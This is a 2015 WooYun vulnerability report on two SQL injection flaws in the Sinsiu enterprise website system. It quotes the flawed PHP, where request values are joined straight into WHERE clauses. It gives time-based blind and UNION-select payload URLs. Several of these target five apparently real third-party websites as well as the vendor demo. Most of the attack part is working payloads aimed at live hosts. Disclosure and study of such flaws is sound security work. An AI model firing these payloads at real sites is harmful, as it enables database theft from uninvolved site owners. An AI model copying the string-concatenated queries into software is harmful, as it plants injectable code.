当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117878

漏洞标题:新秀企业网站系统sql注入2处

相关厂商:新秀企业网站系统

漏洞作者: 路人甲

提交时间:2015-07-01 11:59

修复时间:2015-08-15 12:00

公开时间:2015-08-15 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sinsiu_b2c_1_0_3 bypass

详细说明:

首先看效果
http://localhost:8080/sinsiu_b2c_1_0_3/upload/?/goods/cat-1*if(ascii(substr((select+user()from(b2c_varia)where(var_id=1)),1,1))=114,sleep(5),1)/
这样一来就可以遍历全站了
看看demo
http://b2c.demo.sinsiu.com/?/goods/cat-1*if(ascii(substr((select+user()from(b2c_varia)where(var_id=1)),1,1))=114,sleep(5),1)/
都可以造成延迟
代码:
goods_main.php:

<?php
function module_goods_main()
{
	global $global,$smarty;
	$global['brand'] = get_global('brand');
	$global['price'] = get_global('price');
	$global['sell'] = get_global('sell');
	$goo_promotion = get_global('promotion');
	$goo_best = get_global('best');
	$goo_new = get_global('new');
	$goo_hot = get_global('hot');
	$prefix = 'goods';
	
	if(!$global['id'])
	{
		$list_len = get_varia('img_list_len');
		$obj = new goods();
		$obj->set_field('goo_id,goo_title,goo_x_img,goo_market_price,goo_shop_price');
		if($global['cat'])
		{
			$family = implode(',',get_cat_family('cat_goo',$global['cat']));
			$obj->set_where("goo_cat_id in ($family)");
			$prefix .= '/cat-' . $global['cat'];
		}
		if($global['brand'])
		{
			$obj->set_where('goo_brand_id = '.$global['brand']);
			$prefix .= '/brand-' . $global['brand'];
		}
		if($goo_promotion)
		{
			$obj->set_where('goo_promotion = 1');
			$prefix .= '/promotion-1';
		}elseif($goo_best){
			$obj->set_where('goo_best = 1');
			$prefix .= '/best-1';
		}elseif($goo_new){
			$obj->set_where('goo_new = 1');
			$prefix .= '/new-1';
		}elseif($goo_hot){
			$obj->set_where('goo_hot = 1');
			$prefix .= '/hot-1';
		}
		
		if($global['price'] == 'desc')
		{
			$obj->set_order('goo_shop_price');
		}elseif($global['price'] == 'asc'){
			$obj->set_order('goo_shop_price','asc');
		}	
		if($global['sell'] == 'desc')
		{
			$obj->set_order('goo_sell');
		}elseif($global['sell'] == 'asc'){
			$obj->set_order('goo_sell','asc');
		}
		
		$obj->set_page_size($list_len ? $list_len : 30);
		$obj->set_page_num($global['page']);
		$sheet = $obj->get_sheet();
		for($i = 0; $i < count($sheet); $i ++)
		{
			$sheet[$i]['goo_title'] = cut_str($sheet[$i]['goo_title'],11);
		}
		set_link($obj->get_page_sum());
		$smarty->assign('show_sheet',1);
		$smarty->assign('goods',$sheet);
	}else{
		$obj = new goods();
		$obj->set_where('goo_id = '.$global['id']);
		$goods = $obj->get_one();
		$obj->set_value('goo_hits',$goods['goo_hits'] + 1);
		$obj->edit();
		
		$goods['more_img'] = array();
		if($goods['goo_more_img'] != '')
		{
			$goods['more_img'] = explode('|',$goods['goo_more_img']);
		}
		$goods['brand'] = get_data('brand',$goods['goo_brand_id'],'bra_name');
		
		$goods['att'] = array();
		$obj = new attribute();
		$att_arr = $obj->get_list();
		$goods['att'] = get_att_list($att_arr,$goods['goo_attribute']);
		
		add_to_history($goods['goo_id']);
		
		$obj = new varia();
		$smarty->assign('share_code',$obj->get_value('share_code',true));
		
		$smarty->assign('goods',$goods);
		$smarty->assign('show_sheet',0);
	}
	$smarty->assign('prefix',$prefix);
}
function add_to_history($id)
{
	$val = get_cookie('history');
	if($val == '')
	{
		$val = '|' . $id . '|';
	}elseif(strpos($val,'|' . $id . '|') === false){
		$val = substr($val,1,-1);
		$arr = explode('|',$val);
		$val = '|';
		for($i = 0; $i < count($arr) && $i < 7; $i ++)
		{
			$val .= $arr[$i] . '|';
		}
		$val = '|' . $id . $val;
	}
	set_cookie('history',$val);
}
//新秀
?>


if($global['brand'])
		{
			$obj->set_where('goo_brand_id = '.$global['brand']);
			$prefix .= '/brand-' . $global['brand'];
		}


第二处

$obj = new goods();
		$obj->set_where('goo_id = '.$global['id']);
		$goods = $obj->get_one();


第一处举例证明
1.http://tnkjw.com/?/goods/cat-1*if(1,sleep(5),1)/
2.http://www.ledpf.com/?/goods/cat-1*if(1,sleep(5),1)/
3.http://tnkjw.com/?/goods/cat-1*if(1,sleep(5),1)/
4.http://645.net.cn/?/goods/cat-1*if(1,sleep(1),1)/
5.http://www.nbcxaf.com/?/goods/cat-1*if(1,sleep(1),1)/
第二处举例证明,不知道怎么回事这些网站和实际demo测试反射出来的不是敏感信息
但是从另外一个方面还是可以证明sql注射存在:
1.http://tnkjw.com/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
2.http://www.ledpf.com/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
3.http://tnkjw.com/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
4.http://645.net.cn/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
5.http://www.nbcxaf.com/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
都造成五秒延迟

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝